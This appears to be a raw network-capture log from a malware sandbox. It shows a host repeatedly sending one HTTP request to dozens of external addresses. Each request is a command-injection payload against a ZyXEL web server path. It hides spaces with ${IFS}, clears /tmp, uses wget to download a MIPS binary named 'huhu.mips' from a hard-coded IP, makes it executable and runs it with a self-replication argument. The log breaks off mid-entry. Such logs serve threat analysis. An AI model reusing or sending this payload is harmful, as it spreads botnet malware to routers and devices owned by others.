                                                        Feb 2, 2024 06:21:14.001240969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5471192.168.2.1447606156.251.156.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001296997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5472192.168.2.1457446216.63.93.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001346111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5473192.168.2.1437622119.152.34.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001389027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5474192.168.2.1435970132.172.238.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001408100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5475192.168.2.1445794163.45.243.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001449108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5476192.168.2.1435148101.66.69.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001487017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5477192.168.2.1447328115.192.39.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001554012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5478192.168.2.144867819.90.183.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001580000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5479192.168.2.145691662.62.82.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001616001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5480192.168.2.1435332108.131.26.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001656055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5481192.168.2.1447748140.71.102.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001687050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5482192.168.2.143702412.176.242.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001707077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5483192.168.2.1458400178.30.177.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001740932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5484192.168.2.143436231.70.144.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001785040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5485192.168.2.14365488.109.110.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001841068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5486192.168.2.145846832.121.180.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001876116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5487192.168.2.146046687.158.205.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001903057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5488192.168.2.145953674.203.183.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001966953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5489192.168.2.143924477.65.196.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002001047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5490192.168.2.1435828142.71.85.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002039909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5491192.168.2.143965645.172.2.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002073050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5492192.168.2.1440128157.48.186.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002124071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5493192.168.2.1434718151.122.20.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002146959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5494192.168.2.145222665.250.52.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002188921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5495192.168.2.1439958118.237.104.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002204895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5496192.168.2.1451546218.36.38.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002254009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5497192.168.2.1453692195.59.17.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002289057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5498192.168.2.1459172194.148.188.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002347946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5499192.168.2.145919099.137.46.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002397060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5500192.168.2.145760089.10.14.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002450943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5501192.168.2.1446644141.5.181.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002465963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5502192.168.2.1452198189.44.205.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002509117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5503192.168.2.145592435.100.3.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002541065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5504192.168.2.1438240148.206.87.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002569914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5505192.168.2.1433810188.125.104.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002638102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5506192.168.2.1449680169.243.170.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002662897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5507192.168.2.1457006116.167.68.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002696991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5508192.168.2.143942620.251.14.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002749920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5509192.168.2.1454280151.38.213.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002793074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5510192.168.2.145879852.84.229.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002846956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5511192.168.2.1452834131.134.106.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002877951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5512192.168.2.145443662.173.168.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002929926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5513192.168.2.145511280.250.254.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.002959013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5514192.168.2.1439524116.23.198.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.003011942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5515192.168.2.144697687.168.10.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.006983995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5516192.168.2.143616638.44.163.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007030964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5517192.168.2.1457992191.220.103.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007117987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5518192.168.2.1455974142.250.247.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007158041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5519192.168.2.143557282.157.101.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007186890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5520192.168.2.1448274148.47.78.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007225990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5521192.168.2.143461073.22.199.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007249117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5522192.168.2.1437834191.230.42.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007299900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5523192.168.2.143706272.232.79.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007368088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5524192.168.2.145037843.251.173.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007376909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5525192.168.2.144141443.175.36.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007432938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5526192.168.2.145825469.173.1.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007452965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5527192.168.2.144927053.168.227.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007486105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5528192.168.2.1443930190.21.193.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007540941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5529192.168.2.145671242.100.167.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007567883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5530192.168.2.1435222102.90.95.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007615089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5531192.168.2.143458620.26.80.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007646084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5532192.168.2.144414679.217.212.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007705927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5533192.168.2.145943281.106.142.38443
                                                        TimestampBytes transferredDirectionData
